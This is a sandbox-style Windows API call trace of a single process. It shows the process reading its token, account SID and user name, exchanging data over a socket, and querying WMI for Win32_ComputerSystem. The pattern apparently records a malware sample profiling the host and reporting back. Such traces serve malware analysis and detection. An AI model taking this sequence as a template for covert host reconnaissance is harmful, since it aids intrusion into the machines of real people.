	[0260.193] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0260.310] GetCurrentProcess () returned 0xffffffff
	[0260.310] GetLastError () returned 0x3f0
	[0260.310] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fae998 | out: TokenHandle=0x5fae998*=0x500) returned 1
	[0260.310] GetLastError () returned 0x3f0
	[0260.378] GetCurrentProcess () returned 0xffffffff
	[0260.378] GetLastError () returned 0x3f0
	[0260.379] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5faea8c | out: TokenHandle=0x5faea8c*=0x504) returned 1
	[0260.379] GetLastError () returned 0x3f0
	[0260.379] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5faeb34 | out: TokenInformation=0x0, ReturnLength=0x5faeb34) returned 0
	[0260.379] GetLastError () returned 0x7a
	[0260.379] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x5863e8
	[0260.379] GetLastError () returned 0x7a
	[0260.379] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x1, TokenInformation=0x5863e8, TokenInformationLength=0x24, ReturnLength=0x5faeb34 | out: TokenInformation=0x5863e8, ReturnLength=0x5faeb34) returned 1
	[0260.379] GetLastError () returned 0x7a
	[0260.381] LocalFree (hMem=0x5863e8) returned 0x0
	[0260.381] GetLastError () returned 0x7f
	[0260.399] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x5faea00, DesiredAccess=0x800, PolicyHandle=0x5fae9a8 | out: PolicyHandle=0x5fae9a8) returned 0x0
	[0260.400] GetLastError () returned 0x0
	[0260.403] LsaLookupSids (in: PolicyHandle=0x61c38d0, Count=0x1, Sids=0x2fe04ac*=0x2fe044c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x5fae9d0, Names=0x5fae9c4 | out: ReferencedDomains=0x5fae9d0, Names=0x5fae9c4) returned 0x0
	[0260.403] GetLastError () returned 0x0
	[0260.404] LsaClose (ObjectHandle=0x61c38d0) returned 0x0
	[0260.404] GetLastError () returned 0x0
	[0260.404] LsaFreeMemory (Buffer=0x4e9420) returned 0x0
	[0260.404] GetLastError () returned 0x0
	[0260.404] LsaFreeMemory (Buffer=0x57f490) returned 0x0
	[0260.404] GetLastError () returned 0x0
	[0260.405] send (s=0x424, buf=0x2fe0cd0*, len=49, flags=0) returned 49
	[0260.405] GetLastError () returned 0x0
	[0260.405] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 91
	[0261.190] GetLastError () returned 0x0
	[0261.192] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0261.195] GetUserNameW (in: lpBuffer=0x567598, pcbBuffer=0x5faeb80 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x5faeb80) returned 1
	[0261.200] send (s=0x424, buf=0x2feb658*, len=43, flags=0) returned 43
	[0261.201] GetLastError () returned 0x0
	[0261.201] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 108
	[0262.191] GetLastError () returned 0x0
	[0262.193] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0262.203] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9cc | out: ppv=0x5fae9cc*=0x4a8dec) returned 0x0
	[0262.204] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9c4 | out: pAptType=0x5fae9c4*=1) returned 0x0
	[0262.204] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9c8 | out: ppvObject=0x5fae9c8*=0x0) returned 0x80004002
	[0262.204] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0262.204] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4e4 | out: ppv=0x5fae4e4*=0x608cb70) returned 0x0
	[0262.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae314 | out: ppvObject=0x5fae314*=0x0) returned 0x80004002
	[0262.205] WbemDefPath:IClassFactory:CreateInstance (in: This=0x608cb70, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae34c | out: ppvObject=0x5fae34c*=0x608de40) returned 0x0
	[0262.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x608de40, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0f0 | out: ppvObject=0x5fae0f0*=0x608de40) returned 0x0
	[0262.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x608de40, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae0ac | out: ppvObject=0x5fae0ac*=0x0) returned 0x80004002
	[0262.206] WbemDefPath:IUnknown:AddRef (This=0x608de40) returned 0x3
	[0262.206] CoGetContextToken (in: pToken=0x5fadf38 | out: pToken=0x5fadf38) returned 0x0
	[0262.206] WbemDefPath:IUnknown:QueryInterface (in: This=0x608de40, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf20 | out: ppvObject=0x5fadf20*=0x511708) returned 0x0
	[0262.207] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x511708, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf28 | out: pCid=0x5fadf28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.207] WbemDefPath:IUnknown:Release (This=0x511708) returned 0x3
	[0262.207] CoGetContextToken (in: pToken=0x5fadf30 | out: pToken=0x5fadf30) returned 0x0
	[0262.207] WbemDefPath:IUnknown:AddRef (This=0x608de40) returned 0x4
	[0262.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x608de40, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfa4 | out: ppvObject=0x5fadfa4*=0x0) returned 0x80004002
	[0262.207] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x3
	[0262.207] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x2
	[0262.208] WbemDefPath:IUnknown:Release (This=0x608cb70) returned 0x0
	[0262.208] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x1
	[0262.208] CoGetContextToken (in: pToken=0x5fae7e0 | out: pToken=0x5fae7e0) returned 0x0
	[0262.208] CoGetContextToken (in: pToken=0x5fae7a0 | out: pToken=0x5fae7a0) returned 0x0
	[0262.208] WbemDefPath:IUnknown:AddRef (This=0x608de40) returned 0x2
	[0262.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x608de40, riid=0x5fae81c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae818 | out: ppvObject=0x5fae818*=0x608de40) returned 0x0
	[0262.208] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x2
	[0262.208] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x1
	[0262.208] CoGetContextToken (in: pToken=0x5fae860 | out: pToken=0x5fae860) returned 0x0
	[0262.208] CoGetContextToken (in: pToken=0x5fae820 | out: pToken=0x5fae820) returned 0x0
	[0262.208] WbemDefPath:IUnknown:AddRef (This=0x608de40) returned 0x2
	[0262.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x608de40, riid=0x5fae89c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae898 | out: ppvObject=0x5fae898*=0x608de40) returned 0x0
	[0262.209] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x2
	[0262.209] WbemDefPath:IUnknown:AddRef (This=0x608de40) returned 0x3
	[0262.209] WbemDefPath:IWbemPath:SetText (This=0x608de40, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.209] WbemDefPath:IUnknown:Release (This=0x608de40) returned 0x2
	[0262.209] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea04 | out: puCount=0x5faea04*=0x2) returned 0x0
	[0262.209] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea00*=0x0, pszText=0x0 | out: puBuffLength=0x5faea00*=0x17, pszText=0x0) returned 0x0
	[0262.209] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.209] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea00 | out: puCount=0x5faea00*=0x2) returned 0x0
	[0262.209] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5fae9fc*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9fc*=0x17, pszText=0x0) returned 0x0
	[0262.209] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5fae9fc*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9fc*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.210] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae97c | out: ppv=0x5fae97c*=0x4a8dec) returned 0x0
	[0262.210] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae974 | out: pAptType=0x5fae974*=1) returned 0x0
	[0262.210] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae978 | out: ppvObject=0x5fae978*=0x0) returned 0x80004002
	[0262.210] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0262.210] CoGetClassObject (in: rclsid=0x556acc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae7cc | out: ppv=0x5fae7cc*=0x608dae8) returned 0x0
	[0262.210] WbemLocator:IUnknown:QueryInterface (in: This=0x608dae8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae5fc | out: ppvObject=0x5fae5fc*=0x0) returned 0x80004002
	[0262.210] WbemLocator:IClassFactory:CreateInstance (in: This=0x608dae8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x608cb70) returned 0x0
	[0262.211] WbemLocator:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3d8 | out: ppvObject=0x5fae3d8*=0x608cb70) returned 0x0
	[0262.211] WbemLocator:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae394 | out: ppvObject=0x5fae394*=0x0) returned 0x80004002
	[0262.211] WbemLocator:IUnknown:AddRef (This=0x608cb70) returned 0x3
	[0262.211] CoGetContextToken (in: pToken=0x5fae220 | out: pToken=0x5fae220) returned 0x0
	[0262.211] WbemLocator:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae208 | out: ppvObject=0x5fae208*=0x0) returned 0x80004002
	[0262.212] CoGetContextToken (in: pToken=0x5fae218 | out: pToken=0x5fae218) returned 0x0
	[0262.212] WbemLocator:IUnknown:AddRef (This=0x608cb70) returned 0x4
	[0262.212] WbemLocator:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae28c | out: ppvObject=0x5fae28c*=0x0) returned 0x80004002
	[0262.212] WbemLocator:IUnknown:Release (This=0x608cb70) returned 0x3
	[0262.212] WbemLocator:IUnknown:Release (This=0x608cb70) returned 0x2
	[0262.212] WbemLocator:IUnknown:Release (This=0x608dae8) returned 0x0
	[0262.212] WbemLocator:IUnknown:Release (This=0x608cb70) returned 0x1
	[0262.212] CoGetContextToken (in: pToken=0x5fae724 | out: pToken=0x5fae724) returned 0x0
	[0262.212] CoGetContextToken (in: pToken=0x5fae6e4 | out: pToken=0x5fae6e4) returned 0x0
	[0262.213] WbemLocator:IUnknown:AddRef (This=0x608cb70) returned 0x2
	[0262.213] WbemLocator:IUnknown:QueryInterface (in: This=0x608cb70, riid=0x5fae760*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae75c | out: ppvObject=0x5fae75c*=0x608cb70) returned 0x0
	[0262.213] WbemLocator:IUnknown:Release (This=0x608cb70) returned 0x2
	[0262.213] WbemLocator:IUnknown:Release (This=0x608cb70) returned 0x1
	[0262.213] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5fae954 | out: puCount=0x5fae954*=0x2) returned 0x0
	[0262.213] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=8, puBuffLength=0x5fae950*=0x0, pszText=0x0 | out: puBuffLength=0x5fae950*=0x17, pszText=0x0) returned 0x0
	[0262.213] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=8, puBuffLength=0x5fae950*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae950*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.213] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5fae42c | out: ppv=0x5fae42c*=0x608dee8) returned 0x0
	[0262.213] WbemLocator:IWbemLocator:ConnectServer (in: This=0x608dee8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5fae478 | out: ppNamespace=0x5fae478*=0x6091fac) returned 0x0
	[0262.293] WbemLocator:IUnknown:QueryInterface (in: This=0x6091fac, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae348 | out: ppvObject=0x5fae348*=0x586fec) returned 0x0
	[0262.294] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x586fec, pProxy=0x6091fac, pAuthnSvc=0x5fae390, pAuthzSvc=0x5fae38c, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394, pImpLevel=0x5fae380, pAuthInfo=0x5fae384, pCapabilites=0x5fae388 | out: pAuthnSvc=0x5fae390*=0xa, pAuthzSvc=0x5fae38c*=0x0, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394*=0x6, pImpLevel=0x5fae380*=0x2, pAuthInfo=0x5fae384, pCapabilites=0x5fae388*=0x1) returned 0x0
	[0262.294] WbemLocator:IUnknown:Release (This=0x586fec) returned 0x1
	[0262.294] WbemLocator:IUnknown:QueryInterface (in: This=0x6091fac, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae33c | out: ppvObject=0x5fae33c*=0x58700c) returned 0x0
	[0262.294] WbemLocator:IUnknown:QueryInterface (in: This=0x6091fac, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae338 | out: ppvObject=0x5fae338*=0x586fec) returned 0x0
	[0262.294] WbemLocator:IClientSecurity:SetBlanket (This=0x586fec, pProxy=0x6091fac, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.294] WbemLocator:IUnknown:Release (This=0x586fec) returned 0x2
	[0262.294] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x1
	[0262.294] CoTaskMemFree (pv=0x5863e8) 
	[0262.294] WbemLocator:IUnknown:Release (This=0x608dee8) returned 0x0
	[0262.294] WbemLocator:IUnknown:QueryInterface (in: This=0x6091fac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadcf8 | out: ppvObject=0x5fadcf8*=0x58700c) returned 0x0
	[0262.295] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadcb4 | out: ppvObject=0x5fadcb4*=0x0) returned 0x80004002
	[0262.295] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x0) returned 0x80004002
	[0262.296] WbemLocator:IUnknown:AddRef (This=0x58700c) returned 0x3
	[0262.296] CoGetContextToken (in: pToken=0x5fadb40 | out: pToken=0x5fadb40) returned 0x0
	[0262.296] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb28 | out: ppvObject=0x5fadb28*=0x586f6c) returned 0x0
	[0262.296] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586f6c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadb30 | out: pCid=0x5fadb30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.296] WbemLocator:IUnknown:Release (This=0x586f6c) returned 0x3
	[0262.297] CoGetContextToken (in: pToken=0x5fadb38 | out: pToken=0x5fadb38) returned 0x0
	[0262.297] WbemLocator:IUnknown:AddRef (This=0x58700c) returned 0x4
	[0262.297] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadbac | out: ppvObject=0x5fadbac*=0x586ff4) returned 0x0
	[0262.297] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x4
	[0262.297] WbemLocator:IRpcOptions:Query (in: This=0x586ff4, pPrx=0x58700c, dwProperty=2, pdwValue=0x5fadbd0 | out: pdwValue=0x5fadbd0) returned 0x80004002
	[0262.297] WbemLocator:IUnknown:Release (This=0x586ff4) returned 0x3
	[0262.297] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x2
	[0262.297] CoGetContextToken (in: pToken=0x5fadfac | out: pToken=0x5fadfac) returned 0x0
	[0262.297] CoGetContextToken (in: pToken=0x5fadf6c | out: pToken=0x5fadf6c) returned 0x0
	[0262.298] WbemLocator:IUnknown:AddRef (This=0x58700c) returned 0x3
	[0262.298] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x5fadfe8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fadfe4 | out: ppvObject=0x5fadfe4*=0x6091fac) returned 0x0
	[0262.298] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x3
	[0262.298] WbemLocator:IUnknown:Release (This=0x6091fac) returned 0x2
	[0262.298] WbemLocator:IUnknown:Release (This=0x6091fac) returned 0x1
	[0262.298] CoGetContextToken (in: pToken=0x5fae8c8 | out: pToken=0x5fae8c8) returned 0x0
	[0262.298] WbemLocator:IUnknown:AddRef (This=0x58700c) returned 0x2
	[0262.298] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae4ec | out: ppvObject=0x5fae4ec*=0x58700c) returned 0x0
	[0262.299] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x2
	[0262.299] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x1
	[0262.299] CoGetContextToken (in: pToken=0x5fae0cc | out: pToken=0x5fae0cc) returned 0x0
	[0262.299] CoGetContextToken (in: pToken=0x5fae08c | out: pToken=0x5fae08c) returned 0x0
	[0262.299] WbemLocator:IUnknown:AddRef (This=0x58700c) returned 0x2
	[0262.299] WbemLocator:IUnknown:QueryInterface (in: This=0x58700c, riid=0x5fae108*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5fae104 | out: ppvObject=0x5fae104*=0x6091fac) returned 0x0
	[0262.299] WbemLocator:IUnknown:Release (This=0x58700c) returned 0x2
	[0262.300] WbemLocator:IUnknown:AddRef (This=0x6091fac) returned 0x3
	[0262.300] IWbemServices:ExecQuery (in: This=0x6091fac, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5fae710 | out: ppEnum=0x5fae710*=0x609204c) returned 0x0
	[0262.308] IUnknown:QueryInterface (in: This=0x609204c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3bc | out: ppvObject=0x5fae3bc*=0x6092050) returned 0x0
	[0262.308] IClientSecurity:QueryBlanket (in: This=0x6092050, pProxy=0x609204c, pAuthnSvc=0x5fae404, pAuthzSvc=0x5fae400, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408, pImpLevel=0x5fae3f4, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc | out: pAuthnSvc=0x5fae404*=0xa, pAuthzSvc=0x5fae400*=0x0, pServerPrincName=0x5fae410, pAuthnLevel=0x5fae408*=0x6, pImpLevel=0x5fae3f4*=0x2, pAuthInfo=0x5fae3f8, pCapabilites=0x5fae3fc*=0x1) returned 0x0
	[0262.308] IUnknown:Release (This=0x6092050) returned 0x1
	[0262.308] IUnknown:QueryInterface (in: This=0x609204c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3b0 | out: ppvObject=0x5fae3b0*=0x586f1c) returned 0x0
	[0262.308] IUnknown:QueryInterface (in: This=0x609204c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3ac | out: ppvObject=0x5fae3ac*=0x6092050) returned 0x0
